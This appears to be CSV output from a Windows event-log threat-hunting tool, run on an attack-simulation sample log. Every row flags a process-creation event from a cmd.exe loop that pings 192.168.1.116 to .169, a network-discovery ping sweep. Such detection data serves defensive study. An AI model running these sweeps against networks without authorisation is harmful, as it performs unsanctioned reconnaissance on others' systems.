+2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.116  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.117  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.118  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.119  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.120  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.121  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.122  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.123  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.124  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.125  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.126  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.127  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.128  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.129  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.130  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.131  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.132  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.133  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.134  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.135  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.136  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.137  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.138  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.139  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.140  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.141  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.142  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.143  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.144  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.145  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.146  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.147  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.148  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.149  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.150  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.151  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.152  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.153  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.154  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.155  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.156  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.157  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.158  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.159  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.160  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.161  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.162  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.163  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.164  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.165  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.166  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.167  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.168  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.169  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
